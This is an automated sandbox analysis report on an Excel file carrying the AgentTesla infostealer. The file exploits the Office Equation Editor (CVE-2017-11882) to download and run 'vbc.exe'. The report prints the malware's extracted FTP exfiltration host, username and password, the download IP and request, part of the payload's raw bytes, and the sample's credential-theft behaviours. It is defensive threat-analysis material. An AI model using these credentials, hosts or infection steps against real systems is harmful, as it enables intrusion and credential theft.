Windows Analysis Report
2nd order.xlsx

Overview

General Information

Sample Name: 2nd order.xlsx
Analysis ID: 562302
MD5: 2228ac7e47957e002d910cc94f89de42
SHA1: b501e0c89273dab89064714d02cdac80f2b66081
SHA256: c4cc3595a77129454c15a736113cb88234acc97074f7305754187d9fc168f58a
Tags: xlsx
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Malicious sample detected (through community Yara rule)
Yara detected AgentTesla
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Sigma detected: Execution from Suspicious Folder
.NET source code contains method to dynamically call methods (often used by packers)
Office equation editor drops PE file
.NET source code contains very large array initializations
Machine Learning detection for dropped file
Drops PE files to the user root directory
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection
barindex
Found malware configuration
Source: 5.0.vbc.exe.400000.11.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "FTP Host": "ftp://primesinsured.com/", "Username": "oil1@primesinsured.com", "Password": "R0r?~C#w}a*s"}
Antivirus detection for URL or domain
Source: ftp://primesinsured.com/oil1 Avira URL Cloud: Label: malware
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 5.0.vbc.exe.400000.11.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.5.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.9.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.13.unpack Avira: Label: TR/Spy.Gen8
Source: 5.0.vbc.exe.400000.7.unpack Avira: Label: TR/Spy.Gen8

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: CallConvFastca.pdbx2 source: vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: CallConvFastca.pdb source: vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr

Software Vulnerabilities
barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.12.127.213:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 198.12.127.213:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 51MB

Networking
barindex
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 198.12.127.213 198.12.127.213
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 28 Jan 2022 17:40:42 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24Last-Modified: Fri, 28 Jan 2022 13:52:18 GMTETag: "d2200-5d6a4be475dda"Accept-Ranges: bytesContent-Length: 860672Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0c f5 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 14 0d 00 00 0a 00 00 00 00 00 00 9e 32 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0d 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 32 0d 00 4b 00 00 00 00 60 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d 00 0c 00 00 00 fb 31 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 12 0d 00 00 20 00 00 00 14 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 05 00 00 00 60 0d 00 00 06 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /400/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.213Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: unknown TCP traffic detected without corresponding DNS query: 198.12.127.213
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ftp://primesinsured.com/oil1
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://FujuYs.com
Source: vbc.exe, 00000005.00000002.669295106.0000000002371000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://SsT3DRxYDVjmHt.org
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com
Source: vbc.exe, 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://blog.iandreev.com/
Source: vbc.exe, 00000005.00000002.669330015.00000000023B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, vbc.exe, 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42532842.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /400/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.12.127.213Connection: Keep-Alive

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
.NET source code contains very large array initializations
Source: 5.0.vbc.exe.400000.11.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.cs Large array initialization: .cctor: array initializer size 11947
Source: 5.2.vbc.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.cs Large array initialization: .cctor: array initializer size 11947
Source: 5.0.vbc.exe.400000.5.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.cs Large array initialization: .cctor: array initializer size 11947
Source: 5.0.vbc.exe.400000.9.unpack, u003cPrivateImplementationDetailsu003eu007b1FA04608u002dF754u002d4784u002d9D27u002d53158C5E6177u007d/u003451A691Bu002d4BE7u002d43E4u002dB9BEu002d1BBD2F43E201.cs Large array initialization: .cctor: array initializer size 11947
Yara signature match
Source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.24d5ea4.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 5.0.vbc.exe.400000.11.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.13.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.34f3920.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.3529940.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.2534e8c.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 4.2.vbc.exe.34f3920.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 4.2.vbc.exe.3529940.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: Process Memory Space: vbc.exe PID: 2408, type: MEMORYSTR Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_008C82BC 4_2_008C82BC
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E08B0 4_2_002E08B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0AEF 4_2_002E0AEF
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E0B00 4_2_002E0B00
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9C28 4_2_002E9C28
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9C17 4_2_002E9C17
Source: C:\Users\Public\vbc.exe Code function: 4_2_002E9E82 4_2_002E9E82
Source: C:\Users\Public\vbc.exe Code function: 5_2_008C82BC 5_2_008C82BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_002EF800 5_2_002EF800
Source: C:\Users\Public\vbc.exe Code function: 5_2_002E6048 5_2_002E6048
Source: C:\Users\Public\vbc.exe Code function: 5_2_002E5430 5_2_002E5430
Source: C:\Users\Public\vbc.exe Code function: 5_2_002E5778 5_2_002E5778
Source: C:\Users\Public\vbc.exe Code function: 5_2_002EE0A2 5_2_002EE0A2
Source: C:\Users\Public\vbc.exe Code function: 5_2_002E2197 5_2_002E2197
Source: C:\Users\Public\vbc.exe Code function: 5_2_002EE490 5_2_002EE490
Source: C:\Users\Public\vbc.exe Code function: 5_2_00784870 5_2_00784870
Source: C:\Users\Public\vbc.exe Code function: 5_2_00787C40 5_2_00787C40
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078FAF0 5_2_0078FAF0
Source: C:\Users\Public\vbc.exe Code function: 5_2_007824D0 5_2_007824D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078EB68 5_2_0078EB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078D1C8 5_2_0078D1C8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0078B210 5_2_0078B210
Source: C:\Users\Public\vbc.exe Code function: 5_2_00788208 5_2_00788208
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32 Jump to behavior
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\Public\vbc.exe WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$2nd order.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD815.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/18@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: vbc.exe.2.dr, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc.exe.2.dr, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc[1].exe.2.dr, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: vbc[1].exe.2.dr, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.vbc.exe.8c0000.1.unpack, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.vbc.exe.8c0000.0.unpack, Oz/uT.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.0.vbc.exe.400000.11.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 5.0.vbc.exe.400000.11.unpack, A/b2.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: CallConvFastca.pdbx2 source: vbc.exe.2.dr, vbc[1].exe.2.dr
Source: Binary string: CallConvFastca.pdb source: vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: vbc.exe.2.dr, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: vbc[1].exe.2.dr, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.2.vbc.exe.8c0000.1.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 4.0.vbc.exe.8c0000.0.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.8c0000.10.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.8c0000.8.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.8c0000.3.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.8c0000.4.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 5.0.vbc.exe.8c0000.2.unpack, va/x0.cs .Net Code: eQb System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
